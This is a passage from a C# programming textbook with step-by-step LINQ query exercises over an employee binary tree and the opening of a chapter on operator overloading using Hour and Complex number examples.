        new Employee { Id = 2, FirstName = "Jeff", LastName = "Hay",
                       Department = "Marketing" });
    empTree.Insert(
        new Employee { Id = 4, FirstName = "Charlie", LastName = "Herb",
                       Department = "IT" });
    empTree.Insert(
        new Employee { Id = 6, FirstName = "Chris", LastName = "Preston",
                       Department = "Sales" });
    empTree.Insert(
        new Employee { Id = 3, FirstName = "Dave", LastName = "Barnett",
                       Department = "Sales" });
    empTree.Insert(
        new Employee { Id = 5, FirstName = "Tim", LastName = "Litton",
                       Department = "Marketing" });
}
13. Add the following statements shown in bold to the end of the doWork
method. This code invokes the Select method to list the departments
found in the binary tree.
static void doWork()
{
    ...
    Console.WriteLine("List of departments");
    var depts = empTree.Select(d => d.Department);
    foreach (var dept in depts)
    {
        Console.WriteLine($"Department: {dept}");
    }
}
14. On the Debug menu, click Start Without Debugging.
The application should output the following list of departments:
List of departments
Department: IT
Department: Marketing
Department: Sales
Department: IT
Department: Marketing
Department: Sales
Each department occurs twice because there are two employees in each
department. The order of the departments is determined by the
CompareTo method of the Employee class, which uses the Id property of
each employee to sort the data. The first department is for the employee
with the Id value 1, the second department is for the employee with the
Id value 2, and so on.
15. Press Enter to return to Visual Studio 2017.
16. In the doWork method in the Program class, modify the statement that
creates the enumerable collection of departments as shown in bold in the
following example:
var depts = empTree.Select(d => d.Department).Distinct();
The Distinct method removes duplicate rows from the enumerable
collection.
17. On the Debug menu, click Start Without Debugging.
Verify that the application now displays each department only once, like
this:
List of departments
Department: IT
Department: Marketing
Department: Sales
18. Press Enter to return to Visual Studio 2017.
19. Add the following statements shown in bold to the end of the doWork
method. This block of code uses the Where method to filter the
employees and return only those in the IT department. The Select
method returns the entire row rather than projecting specific columns.
static void doWork()
{
...
Console.WriteLine();
Console.WriteLine("Employees in the IT department");
var ITEmployees =
empTree.Where(e => String.Equals(e.Department, "IT"))
.Select(emp => emp);
foreach (var emp in ITEmployees)
{
Console.WriteLine(emp);
}
}
20. After the code from the preceding step, add the following code shown in
bold to the end of the doWork method. This code uses the GroupBy
method to group the employees found in the binary tree by department.
The outer foreach statement iterates through each group, displaying the
name of the department. The inner foreach statement displays the names
of the employees in each department.
static void doWork()
{
    ...
    Console.WriteLine("");
    Console.WriteLine("All employees grouped by department");
    var employeesByDept = empTree.GroupBy(e => e.Department);
    foreach (var dept in employeesByDept)
    {
        Console.WriteLine($"Department: {dept.Key}");
        foreach (var emp in dept)
        {
            Console.WriteLine($"\t{emp.FirstName} {emp.LastName}");
        }
    }
}
21. On the Debug menu, click Start Without Debugging. Verify that the
output of the application looks like this:
List of departments
Department: IT
Department: Marketing
Department: Sales
Employees in the IT department
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 4, Name: Charlie Herb, Dept: IT
All employees grouped by department
Department: IT
Kim Abercrombie
Charlie Herb
Department: Marketing
Jeff Hay
Tim Litton
Department: Sales
Dave Barnett
Chris Preston
22. Press Enter to return to Visual Studio 2017.
Retrieve data from a BinaryTree by using query operators
1. In the doWork method, comment out the statement that generates the
enumerable collection of departments and replace it with the equivalent
statement shown in bold, using the from and select query operators:
// var depts = empTree.Select(d => d.Department).Distinct();
var depts = (from d in empTree
select d.Department).Distinct();
2. Comment out the statement that generates the enumerable collection of
employees in the IT department and replace it with the following code
shown in bold:
// var ITEmployees =
// empTree.Where(e => String.Equals(e.Department, "IT"))
// .Select(emp => emp);
var ITEmployees = from e in empTree
where String.Equals(e.Department, "IT")
select e;
3. Comment out the statement that generates the enumerable collection that
groups employees by department and replace it with the statement
shown in bold in the following code:
// var employeesByDept = empTree.GroupBy(e => e.Department);
var employeesByDept = from e in empTree
group e by e.Department;
4. On the Debug menu, click Start Without Debugging. Verify that the
program displays the same results as before.
List of departments
Department: IT
Department: Marketing
Department: Sales
Employees in the IT department
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 4, Name: Charlie Herb, Dept: IT
All employees grouped by department
Department: IT
Kim Abercrombie
Charlie Herb
Department: Marketing
Jeff Hay
Tim Litton
Department: Sales
Dave Barnett
Chris Preston
5. Press Enter to return to Visual Studio 2017.
LINQ and deferred evaluation
When you use LINQ to define an enumerable collection, either by using the
LINQ extension methods or by using query operators, you should remember
that the application does not actually build the collection at the time that the
LINQ extension method is executed; the collection is enumerated only when
you iterate over it. This means that the data in the original collection can
change in the time between the execution of a LINQ query and when the data
that the query identifies is retrieved; you will always fetch the most up-to-
date data. For example, the following query (which you saw earlier) defines
an enumerable collection of companies in the United States:
var usCompanies = from a in addresses
where String.Equals(a.Country, "United States")
select a.CompanyName;
The data in the addresses array is not retrieved, and any conditions
specified in the Where filter are not evaluated, until you iterate through the
usCompanies collection:
foreach (string name in usCompanies)
{
Console.WriteLine(name);
}
If you modify the data in the addresses array in the time between defining
the usCompanies collection and iterating through the collection (for example,
if you add a new company based in the United States), you will see this new
data. This strategy is referred to as deferred evaluation.
You can force the evaluation of a LINQ query when it is defined and
generate a static, cached collection. This collection is a copy of the original
data and will not change if the data in the collection changes. LINQ provides
the ToList method to build a static List object containing a cached copy of the
data. You use it like this:
var usCompanies = from a in addresses.ToList()
where String.Equals(a.Country, "United States")
select a.CompanyName;
This time, the list of companies is fixed when you create the query. If you
add more United States companies to the addresses array, you will not see
them when you iterate through the usCompanies collection. LINQ also
provides the ToArray method that stores the cached collection as an array.
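Using ToArray is directly analogous to using ToList. For example, this sketch caches the address data in an array at the point where the query is defined:

var usCompanies = from a in addresses.ToArray()
                  where String.Equals(a.Country, "United States")
                  select a.CompanyName;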
In the final exercise in this chapter, you will compare the effects of using
deferred evaluation of a LINQ query to generating a cached collection.
Examine the effects of deferred and cached evaluation of a LINQ query
1. Return to Visual Studio 2017, display the QueryBinaryTree project, and
then edit the Program.cs file.
2. Comment out the contents of the doWork method apart from the
statements that construct the empTree binary tree, as shown here:
static void doWork()
{
    Tree<Employee> empTree = new Tree<Employee>(
        new Employee { Id = 1, FirstName = "Kim", LastName = "Abercrombie",
                       Department = "IT" });
    ...
    empTree.Insert(
        new Employee { Id = 5, FirstName = "Tim", LastName = "Litton",
                       Department = "Marketing" });

    /* comment out the rest of the method
    ...
    */
}
Tip You can comment out a block of code by selecting the entire
block in the Code and Text Editor window and then clicking the
Comment Out The Selected Lines button on the toolbar.
3. Add the following statements shown in bold to the doWork method,
after the code that creates and populates the empTree binary tree:
static void doWork()
{
...
Console.WriteLine("All employees");
var allEmployees = from e in empTree
select e;
foreach (var emp in allEmployees)
{
Console.WriteLine(emp);
}
...
}
This code generates an enumerable collection of employees named
allEmployees and then iterates through this collection, displaying the
details of each employee.
4. Add the following code immediately after the statements you typed in
the preceding step:
static void doWork()
{
...
empTree.Insert(new Employee
{
Id = 7,
FirstName = "David",
LastName = "Simpson",
Department = "IT"
});
Console.WriteLine();
Console.WriteLine("Employee added");
Console.WriteLine("All employees");
foreach (var emp in allEmployees)
{
Console.WriteLine(emp);
}
...
}
These statements add a new employee to the empTree tree and then
iterate through the allEmployees collection again.
5. On the Debug menu, click Start Without Debugging. Verify that the
output of the application looks like this:
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Employee added
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Id: 7, Name: David Simpson, Dept: IT
Notice that the second time the application iterates through the
allEmployees collection, the list displayed includes David Simpson,
even though this employee was added only after the allEmployees
collection was defined.
6. Press Enter to return to Visual Studio 2017.
7. In the doWork method, change the statement that generates the
allEmployees collection to identify and cache the data immediately, as
shown here in bold:
var allEmployees = from e in empTree.ToList<Employee>()
select e;
LINQ provides generic and nongeneric versions of the ToList and
ToArray methods. If possible, it is better to use the generic versions of
these methods to ensure the type safety of the result. The data returned
by the select operator is an Employee object, and the code shown in this
step generates allEmployees as a generic List<Employee> collection.
8. On the Debug menu, click Start Without Debugging. Verify that the
output of the application looks like this:
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Employee added
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Notice that the second time the application iterates through the
allEmployees collection, the list displayed does not include David
Simpson. In this case, the query is evaluated and the results are cached
before David Simpson is added to the empTree binary tree.
9. Press Enter to return to Visual Studio 2017.
Summary
In this chapter, you learned how LINQ uses the IEnumerable<T> interface
and extension methods to provide a mechanism for querying data. You also
saw how these features support the query expression syntax in C#.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 22, ”Operator overloading.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Project specified fields from an enumerable collection
Use the Select method and specify a lambda
expression that identifies the fields to project. For
example:
var customerFirstNames =
    customers.Select(cust => cust.FirstName);
Or use the from and select query operators. For
example:
var customerFirstNames =
from cust in customers
select cust.FirstName;
Filter rows from an enumerable collection
Use the Where method, and specify a lambda
expression containing the criteria that rows should
match. For example:
var usCompanies = addresses
    .Where(addr => String.Equals(addr.Country, "United States"))
    .Select(usComp => usComp.CompanyName);

Or use the where query operator. For example:

var usCompanies =
    from a in addresses
    where String.Equals(a.Country, "United States")
    select a.CompanyName;
Enumerate data in a specific order
Use the OrderBy method and specify a lambda
expression identifying the field to use to order
rows. For example:
var companyNames = addresses
.OrderBy(addr => addr.CompanyName)
.Select(comp => comp.CompanyName);
Or, use the orderby query operator. For example:
var companyNames =
from a in addresses
orderby a.CompanyName
select a.CompanyName;
Group data by the values in a field
Use the GroupBy method and specify a lambda
expression identifying the field to use to group
rows. For example:
var companiesGroupedByCountry = addresses
    .GroupBy(addrs => addrs.Country);
Or, use the group by query operator. For example:
var companiesGroupedByCountry =
from a in addresses
group a by a.Country;
Join data held in two different collections
Use the Join method, specifying the collection
with which to join, the join criteria, and the fields
for the result. For example:
var countriesAndCustomers = customers
    .Select(c => new { c.FirstName, c.LastName, c.CompanyName })
    .Join(addresses,
          custs => custs.CompanyName,
          addrs => addrs.CompanyName,
          (custs, addrs) => new { custs.FirstName, custs.LastName, addrs.Country });
Or, use the join query operator. For example:
Or, use the join query operator. For example:

var countriesAndCustomers =
    from a in addresses
    join c in customers
    on a.CompanyName equals c.CompanyName
    select new { c.FirstName, c.LastName, a.Country };
Force immediate generation of the results for a LINQ query
Use the ToList or ToArray method to generate a
list or an array containing the results. For
example:
var allEmployees =
from e in empTree.ToList<Employee>()
select e;
CHAPTER 22
Operator overloading
After completing this chapter, you will be able to:
Implement binary operators for your own types.
Implement unary operators for your own types.
Write increment and decrement operators for your own types.
Understand the need to implement some operators as pairs.
Implement implicit conversion operators for your own types.
Implement explicit conversion operators for your own types.
The examples throughout this book make great use of the standard operator
symbols (such as + and –) to perform standard operations (such as addition
and subtraction) on types (such as int and double). Many of the built-in types
come with their own predefined behaviors for each operator. You can also
define how operators should behave in your own structures and classes,
which is the subject of this chapter.
Understanding operators
It is worth recapping some of the fundamental aspects of operators before
delving into the details of how they work and how you can overload them.
The following list summarizes these aspects:
You use operators to combine operands into expressions. Each operator
has its own semantics, dependent on the type with which it works. For
example, the + operator means “add” when you use it with numeric
types or “concatenate” when you use it with strings.
Each operator has a precedence. For example, the * operator has a
higher precedence than the + operator. This means that the expression
a + b * c is the same as a + (b * c).
Each operator also has an associativity that defines whether the
operator evaluates from left to right or from right to left. For example,
the = operator is right-associative (it evaluates from right to left), so a
= b = c is the same as a = (b = c).
A unary operator is an operator that has just one operand. For
example, the increment operator (++) is a unary operator.
A binary operator is an operator that has two operands. For example,
the multiplication operator (*) is a binary operator.
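The following minimal sketch shows precedence and associativity at work with the built-in int type:

int x = 2 + 3 * 4;  // * has higher precedence than +, so x is 14, not 20
int a, b, c = 5;
a = b = c;          // = is right-associative: a = (b = c), so a and b are both 5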
Operator constraints
This book presents many examples of how with C# you can overload
methods when defining your own types. With C#, you can also overload
many of the existing operator symbols for your own types, although the
syntax is slightly different. When you do this, the operators you implement
automatically fall into a well-defined framework with the following rules:
You cannot change the precedence and associativity of an operator.
Precedence and associativity are based on the operator symbol (for
example, +) and not on the type (for example, int) on which the
operator symbol is being used. Hence, the expression a + b * c is
always the same as a + (b * c) regardless of the types of a, b, and c.
You cannot change the multiplicity (the number of operands) of an
operator. For example, * (the symbol for multiplication) is a binary
operator. If you declare a * operator for your own type, it must be a
binary operator.
You cannot invent new operator symbols. For example, you can’t
create an operator symbol such as ** for raising one number to the
power of another number. You’d have to define a method to do that.
You can’t change the meaning of operators when they are applied to
built-in types. For example, the expression 1 + 2 has a predefined
meaning, and you’re not allowed to override this meaning. If you could
do this, things would be too complicated.
There are some operator symbols that you can’t overload. For example,
you can’t overload the dot (.) operator, which indicates access to a
class member. Again, if you could do this, it would lead to unnecessary
complexity.
Tip You can use indexers to simulate [ ] as an operator. Similarly, you
can use properties to simulate assignment (=) as an operator, and you
can use delegates to mimic a function call as an operator.
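For example, the following minimal sketch shows an indexer standing in for the [ ] operator; the Clock class and its readings array are hypothetical, not part of this chapter's exercises:
class Clock
{
    private int[] readings = new int[24];

    // An indexer gives callers []-style syntax even though the [] symbol
    // itself cannot be overloaded.
    public int this[int index]
    {
        get => this.readings[index];
        set => this.readings[index] = value;
    }
}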
Overloaded operators
To define your own operator behavior, you must overload a selected operator.
You use method-like syntax with a return type and parameters, but the name
of the method is the keyword operator together with the operator symbol you
are declaring. For example, the following code shows a user-defined structure
named Hour that defines a binary + operator to add together two instances of
Hour.
struct Hour
{
    public Hour(int initialValue) => this.value = initialValue;

    public static Hour operator +(Hour lhs, Hour rhs) =>
        new Hour(lhs.value + rhs.value);
    ...
    private int value;
}
Notice the following:
The operator is public. All operators must be public.
The operator is static. All operators must be static. Operators are never
polymorphic and cannot use the virtual, abstract, override, or sealed
modifiers.
A binary operator (such as the + operator shown in this example) has
two explicit arguments, and a unary operator has one explicit
argument. (C++ programmers should note that operators never have a
hidden this parameter.)
Tip When you declare highly stylized functionality (such as operators),
it is useful to adopt a naming convention for the parameters. For
example, developers often use lhs and rhs (acronyms for left-hand side
and right-hand side, respectively) for binary operators.
When you use the + operator on two expressions of type Hour, the C#
compiler automatically converts your code to a call to your operator +
method. The C# compiler transforms this code:
Hour Example(Hour a, Hour b) => a + b;
to this:
Hour Example(Hour a, Hour b) => Hour.operator +(a,b); // pseudocode
Note, however, that this syntax is pseudocode and not valid C#. You can
use a binary operator only in its standard infix notation (with the symbol
between the operands).
There is one final rule that you must follow when declaring an operator: at
least one of the parameters must always be of the containing type. In the
preceding operator+ example for the Hour structure, one of the parameters, a or
b, must be an Hour object. In this example, both parameters are Hour objects.
However, there could be times when you want to define additional
implementations of operator+ that add, for example, an integer (a number of
hours) to an Hour object—the first parameter could be Hour, and the second
parameter could be the integer. This rule makes it easier for the compiler to
know where to look when trying to resolve an operator invocation, and it also
ensures that you can’t change the meaning of the built-in operators.
Creating symmetric operators
In the preceding section, you saw how to declare a binary + operator to add
together two instances of type Hour. The Hour structure also has a
constructor that creates an Hour from an int. This means that you can add
together an Hour and an int; you just have to first use the Hour constructor to
convert the int to an Hour, as in the following example:
Hour a = ...;
int b = ...;
Hour later = a + new Hour(b);
This is certainly valid code, but it is not as clear or concise as adding an
Hour and an int directly, like this:
Hour a = ...;
int b = ...;
Hour later = a + b;
To make the expression (a + b) valid, you must specify what it means to
add together an Hour (a, on the left) and an int (b, on the right). In other
words, you must declare a binary + operator whose first parameter is an Hour
and whose second parameter is an int. The following code shows the
recommended approach:
struct Hour
{
    public Hour(int initialValue) => this.value = initialValue;
    ...
    public static Hour operator +(Hour lhs, Hour rhs) =>
        new Hour(lhs.value + rhs.value);

    public static Hour operator +(Hour lhs, int rhs) =>
        lhs + new Hour(rhs);
    ...
    private int value;
}
Notice that all the second version of the operator does is construct an
Hour from its int argument and then call the first version. In this way, the real
logic behind the operator is held in a single place. The point is that the extra
operator+ simply makes existing functionality easier to use. Also, notice that
you should not provide many different versions of this operator, each with a
different second parameter type; instead, cater to the common and
meaningful cases only, and let the user of the class take any additional steps
if an unusual case is required.
This operator+ declares how to add together an Hour as the left operand
and an int as the right operand. It does not declare how to add together an int
as the left operand and an Hour as the right operand:
int a = ...;
Hour b = ...;
Hour later = a + b; // compile-time error
This is counterintuitive. If you can write the expression a + b, you expect
also to be able to write b + a. Therefore, you should provide another overload
of operator+:
struct Hour
{
    public Hour(int initialValue) => this.value = initialValue;
    ...
    public static Hour operator +(Hour lhs, int rhs) =>
        lhs + new Hour(rhs);

    public static Hour operator +(int lhs, Hour rhs) =>
        new Hour(lhs) + rhs;
    ...
    private int value;
}
Note C++ programmers should notice that you must provide the
overload yourself. The compiler won’t write the overload for you or
silently swap the sequence of the two operands to find a matching
operator.
Operators and language interoperability
Not all languages that execute using the common language runtime
(CLR) support or understand operator overloading. If you overload an
operator, you should provide an alternative mechanism that implements
the same functionality to enable the class to be used from languages that
do not support operator overloading. For example, suppose that you
implement operator+ for the Hour structure, as is illustrated here:
public static Hour operator +(Hour lhs, int rhs)
{
    ...
}
If you need to be able to use your class from a Microsoft Visual
Basic application, you should also provide an Add method that achieves
the same thing, as demonstrated here:
public static Hour Add(Hour lhs, int rhs)
{
    ...
}
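One straightforward approach, sketched here on the assumption that operator+ is already defined, is to implement Add by delegating to the operator so that the logic lives in a single place:
public static Hour Add(Hour lhs, int rhs) => lhs + rhs; // delegates to operator+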
Understanding compound assignment evaluation
A compound assignment operator (such as +=) is always evaluated in terms
of its associated simple operator (such as +). In other words, the statement
a += b;
is automatically evaluated like this:
a = a + b;
In general, the expression a @= b (where @ represents any valid
operator) is always evaluated as a = a @ b. If you have overloaded the
appropriate simple operator, the overloaded version is automatically called
when you use its associated compound assignment operator, as is shown in
the following example:
Hour a = ...;
int b = ...;
a += a; // same as a = a + a
a += b; // same as a = a + b
The first compound assignment expression (a += a) is valid because a is
of type Hour, and the Hour type declares a binary operator+ whose
parameters are both Hour. Similarly, the second compound assignment
expression (a += b) is also valid because a is of type Hour and b is of type
int. The Hour type also declares a binary operator+ whose first parameter is
an Hour and whose second parameter is an int. Be aware, however, that you
cannot write the expression b += a because that’s the same as b = b + a.
Although the addition is valid, the assignment is not, because there is no way
to assign an Hour to the built-in int type.
Declaring increment and decrement operators
With C#, you can declare your own version of the increment (++) and
decrement (--) operators. The usual rules apply when declaring these
operators: they must be public, they must be static, and they must be unary
(they can take only a single parameter). Here is the increment operator for the
Hour structure:
struct Hour
{
    ...
    public static Hour operator ++(Hour arg)
    {
        arg.value++;
        return arg;
    }
    ...
    private int value;
}
The increment and decrement operators are unique in that they can be
used in prefix and postfix forms. C# cleverly uses the same single operator
for both the prefix and postfix versions. The result of a postfix expression is
the value of the operand before the expression takes place. In other words, the
compiler effectively converts the code
Hour now = new Hour(9);
Hour postfix = now++;
to this:
Hour now = new Hour(9);
Hour postfix = now;
now = Hour.operator ++(now); // pseudocode, not valid C#
The result of a prefix expression is the return value of the operator, so the
C# compiler effectively transforms the code
Hour now = new Hour(9);
Hour prefix = ++now;
to this:
Hour now = new Hour(9);
now = Hour.operator ++(now); // pseudocode, not valid in C#
Hour prefix = now;
This equivalence means that the return type of the increment and
decrement operators must be the same as the parameter type.
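Although only the increment operator is shown above, a decrement operator for the Hour structure would follow exactly the same pattern. Here is a minimal sketch:
struct Hour
{
    ...
    public static Hour operator --(Hour arg)
    {
        arg.value--;
        return arg;
    }
    ...
    private int value;
}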
Comparing operators in structures and classes
Be aware that the implementation of the increment operator in the Hour
structure works only because Hour is a structure. If you change Hour into a
class but leave the implementation of its increment operator unchanged, you
will find that the postfix translation won’t give the correct answer. If you
remember that a class is a reference type, and if you revisit the compiler
translations explained earlier, you can see in the following example why the
operators for the Hour class no longer function as expected:
Hour now = new Hour(9);
Hour postfix = now;
now = Hour.operator ++(now); // pseudocode, not valid C#
If Hour is a class, the assignment statement postfix = now makes the
variable postfix refer to the same object as now. Updating now automatically
updates postfix! If Hour is a structure, the assignment statement makes a copy
of now in postfix, and any changes to now leave postfix unchanged, which is
what you want.
The correct implementation of the increment operator when Hour is a
class is as follows:
class Hour
{
    public Hour(int initialValue) => this.value = initialValue;
    ...
    public static Hour operator ++(Hour arg) => new Hour(arg.value + 1);
    ...
    private int value;
}
Notice that operator ++ now creates a new object based on the data in the
original. The data in the new object is incremented, but the data in the
original is left unchanged. Although this works, the compiler translation of
the increment operator results in a new object being created each time it is
used. This can be expensive in terms of memory use and garbage-collection
overhead. Therefore, it is recommended that you limit operator overloads
when you define types. This recommendation applies to all operators, not just
to the increment operator.
Defining operator pairs
Some operators naturally come in pairs. For example, if you can compare two
Hour values by using the != operator, you would expect to be able to also
compare two Hour values by using the == operator. The C# compiler
enforces this very reasonable expectation by insisting that if you define either
operator == or operator !=, you must define them both. This neither-or-both
rule also applies to the < and > operators and the <= and >= operators. The
C# compiler does not write any of these operator partners for you. You must
write them all explicitly yourself, regardless of how obvious they might
seem. Here are the == and != operators for the Hour structure:
struct Hour
{
    public Hour(int initialValue) => this.value = initialValue;
    ...
    public static bool operator ==(Hour lhs, Hour rhs) =>
        lhs.value == rhs.value;

    public static bool operator !=(Hour lhs, Hour rhs) =>
        lhs.value != rhs.value;
    ...
    private int value;
}
The return type from these operators does not actually have to be Boolean.
However, you should have a very good reason for using some other type, or
these operators could become very confusing.
Overriding the equality operators
If you define operator == and operator != in a class, you should also
override the Equals and GetHashCode methods inherited from
System.Object (or System.ValueType if you are creating a structure).
The Equals method should exhibit the same behavior as operator ==.
(You should define one in terms of the other.) The GetHashCode
method is used by other classes in the Microsoft .NET Framework.
(When you use an object as a key in a hash table, for example, the
GetHashCode method is called on the object to help calculate a hash
value. For more information, see the .NET Framework reference
documentation supplied with Visual Studio 2017.) All this method
needs to do is return a distinguishing integer value. Don’t return the
same integer from the GetHashCode method of all your objects,
however, because this will nullify the effectiveness of the hashing
algorithms.
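For a simple wrapper type such as the Hour structure from earlier in this chapter, one reasonable sketch is to derive Equals and GetHashCode from the wrapped value, so that Equals, GetHashCode, and operator == all stay consistent with one another:
struct Hour
{
    ...
    // Defined in terms of operator ==, which compares the wrapped values
    // directly, so there is no recursion.
    public override bool Equals(object obj) => (obj is Hour) && (this == (Hour)obj);
    public override int GetHashCode() => this.value.GetHashCode();
    ...
    private int value;
}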
Implementing operators
In the following exercise, you will develop a class that simulates complex
numbers.
A complex number has two elements: a real component and an imaginary
component. Typically, a complex number is represented in the form (x + iy),
where x is the real component, and iy is the imaginary component. The values
of x and y are regular integers, and i represents the square root of –1 (which is
the reason why iy is imaginary). Despite their rather obscure and theoretical
feel, complex numbers have a large number of uses in the fields of
electronics, applied mathematics, and physics, and in many aspects of
engineering. If you want more information about how and why complex
numbers are useful, Wikipedia provides a useful and informative article.
Note The Microsoft .NET Framework version 4.0 and later includes a
type called Complex in the System.Numerics namespace that
implements complex numbers, so there is no real need to define your
own version of this type anymore. However, it is still instructive to see
how to implement some of the common operators for this type.
You will implement complex numbers as a pair of integers that represent
the coefficients x and y for the real and imaginary elements. You will also
implement the operators necessary for performing simple arithmetic using
complex numbers. The following table summarizes how to perform the four
primary arithmetic operations on a pair of complex numbers, (a + bi) and (c +
di).
Operation              Calculation
(a + bi) + (c + di)    ((a + c) + (b + d)i)
(a + bi) – (c + di)    ((a – c) + (b – d)i)
(a + bi) * (c + di)    ((a * c – b * d) + (b * c + a * d)i)
(a + bi) / (c + di)    (((a * c + b * d) / (c * c + d * d)) + ((b * c – a * d) / (c * c + d * d))i)
Create the Complex class and implement the arithmetic operators
1. Start Visual Studio 2017 if it is not already running.
2. Open the ComplexNumbers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 22\ComplexNumbers folder in your Documents
folder. This is a console application that you will use to build and test
your code. The Program.cs file contains the familiar doWork method.
3. In Solution Explorer, click the ComplexNumbers project. On the Project
menu, click Add Class. In the Add New Item - ComplexNumbers dialog
box, in the Name box, type Complex.cs, and then click Add.
Visual Studio creates the Complex class and opens the Complex.cs file
in the Code and Text Editor window.
4. Add the automatic integer properties Real and Imaginary to the Complex
class, as shown by the code in bold that follows.
class Complex
{
    public int Real { get; set; }
    public int Imaginary { get; set; }
}
These properties will hold the real and imaginary components of a
complex number.
5. Add the constructor shown below in bold to the Complex class.
class Complex
{
    ...
    public Complex(int real, int imaginary)
    {
        this.Real = real;
        this.Imaginary = imaginary;
    }
}
This constructor takes two int parameters and uses them to populate the
Real and Imaginary properties.
6. Override the ToString method as shown next in bold.
class Complex
{
    ...
    public override string ToString() => $"({this.Real} + {this.Imaginary}i)";
}
This method returns a string representing the complex number in the
form (x + yi).
7. Add the overloaded + operator to the Complex class as shown in bold in
the code that follows:
class Complex
{
    ...
    public static Complex operator +(Complex lhs, Complex rhs) =>
        new Complex(lhs.Real + rhs.Real, lhs.Imaginary + rhs.Imaginary);
}
This is the binary addition operator. It takes two Complex objects and
adds them together by performing the calculation shown in the table at
the start of the exercise. The operator returns a new Complex object
containing the results of this calculation.
8. Add the overloaded – operator to the Complex class.
class Complex
{
    ...
    public static Complex operator -(Complex lhs, Complex rhs) =>
        new Complex(lhs.Real - rhs.Real, lhs.Imaginary - rhs.Imaginary);
}
This operator follows the same form as the overloaded + operator.
9. Implement the * operator and / operator by adding the code shown in
bold to the Complex class.
class Complex
{
    ...
    public static Complex operator *(Complex lhs, Complex rhs) =>
        new Complex(lhs.Real * rhs.Real - lhs.Imaginary * rhs.Imaginary,
                    lhs.Imaginary * rhs.Real + lhs.Real * rhs.Imaginary);

    public static Complex operator /(Complex lhs, Complex rhs)
    {
        int realElement = (lhs.Real * rhs.Real + lhs.Imaginary * rhs.Imaginary) /
                          (rhs.Real * rhs.Real + rhs.Imaginary * rhs.Imaginary);
        int imaginaryElement = (lhs.Imaginary * rhs.Real - lhs.Real * rhs.Imaginary) /
                               (rhs.Real * rhs.Real + rhs.Imaginary * rhs.Imaginary);
        return new Complex(realElement, imaginaryElement);
    }
}
These operators follow the same form as the previous two operators,
although the calculations are a little more complicated. (The calculation
for the / operator has been broken down into two steps to avoid lengthy
lines of code.)
10. Display the Program.cs file in the Code and Text Editor window. Add
the following statements shown in bold to the doWork method of the
Program class and delete the // TODO: comment:
static void doWork()
{
    Complex first = new Complex(10, 4);
    Complex second = new Complex(5, 2);
    Console.WriteLine($"first is {first}");
    Console.WriteLine($"second is {second}");

    Complex temp = first + second;
    Console.WriteLine($"Add: result is {temp}");

    temp = first - second;
    Console.WriteLine($"Subtract: result is {temp}");

    temp = first * second;
    Console.WriteLine($"Multiply: result is {temp}");

    temp = first / second;
    Console.WriteLine($"Divide: result is {temp}");
}
This code creates two Complex objects that represent the complex
values (10 + 4i) and (5 + 2i). The code displays them and then tests each
of the operators you have just defined, displaying the results in each
case.
11. On the Debug menu, click Start Without Debugging.
Verify that the application displays the results shown in the following
image:
12. Close the application, and return to the Visual Studio 2017 programming
environment.
You have now created a type that models complex numbers and supports
basic arithmetic operations. In the next exercise, you will extend the Complex
class and provide the equality operators, == and !=.
Implement the equality operators
1. In Visual Studio 2017, display the Complex.cs file in the Code and Text
Editor window.
2. Add the == and != operators to the Complex class as shown in bold in
the following example.
class Complex
{
    ...
    public static bool operator ==(Complex lhs, Complex rhs) => lhs.Equals(rhs);
    public static bool operator !=(Complex lhs, Complex rhs) => !(lhs.Equals(rhs));
}
Notice that both of these operators make use of the Equals method. The
Equals method compares an instance of a class against another instance
specified as an argument. It returns true if they have equivalent values
and false otherwise. You need to provide your own implementation of
this method for the equality operators to work correctly.
3. Override the Equals method in the Complex class, by adding the
following shown here in bold:
class Complex
{
    ...
    public override bool Equals(Object obj)
    {
        if (obj is Complex)
        {
            Complex compare = (Complex)obj;
            return (this.Real == compare.Real) &&
                   (this.Imaginary == compare.Imaginary);
        }
        else
        {
            return false;
        }
    }
}
The Equals method takes an Object as a parameter. This code verifies
that the type of the parameter is actually a Complex object. If it is, this
code compares the values in the Real and Imaginary properties in the
current instance and the parameter passed in. If they are the same, the
method returns true; otherwise, it returns false. If the parameter passed
in is not a Complex object, the method returns false.
Important It is tempting to write the Equals method like this:
public override bool Equals(Object obj)
{
    Complex compare = obj as Complex;
    if (compare != null)
    {
        return (this.Real == compare.Real) &&
               (this.Imaginary == compare.Imaginary);
    }
    else
    {
        return false;
    }
}
However, the expression compare != null invokes the !=
operator of the Complex class, which calls the Equals method
again, resulting in a recursive loop.
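If you prefer the compact style of the version above, C# 7 pattern matching (supported by Visual Studio 2017) gives you a sketch that is equally concise but safe, because it never invokes the overloaded != operator:
public override bool Equals(Object obj)
{
    // The is pattern tests the type and performs the cast in a single
    // step, without calling the == or != operators of the Complex class.
    if (obj is Complex compare)
    {
        return (this.Real == compare.Real) &&
               (this.Imaginary == compare.Imaginary);
    }
    return false;
}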
4. On the Build menu, click Rebuild Solution.
The Error List window displays the following warning messages:
'ComplexNumbers.Complex' overrides Object.Equals(object o) but does not
override Object.GetHashCode()
'ComplexNumbers.Complex' defines operator == or operator != but does not
override Object.GetHashCode()
If you define the != and == operators, you should also override the
